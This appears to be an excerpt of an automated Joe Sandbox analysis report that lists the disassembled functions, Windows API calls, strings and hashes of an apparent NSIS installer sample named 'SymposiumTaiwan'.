Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F
^F, xrefs: 00406ACF
NUL, xrefs: 00406ACA
plF, xrefs: 00406B54

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406A73

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406858
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406A7F

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: d28433864b4d3a2481731081a8cbeb7a0f2bcceb6c22eb94dadda467bc783426
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: d28433864b4d3a2481731081a8cbeb7a0f2bcceb6c22eb94dadda467bc783426
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 75e8dd1e889fc21f11d688468e3db6e7567b4992a32c7386c263c217e3cb8233
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 75e8dd1e889fc21f11d688468e3db6e7567b4992a32c7386c263c217e3cb8233
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: b07d39edd45b6d2841688a986433f0381924528bdc22dd5a03576e07f79a18b6
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: b07d39edd45b6d2841688a986433f0381924528bdc22dd5a03576e07f79a18b6
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0000D400,00000064,3559C050), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

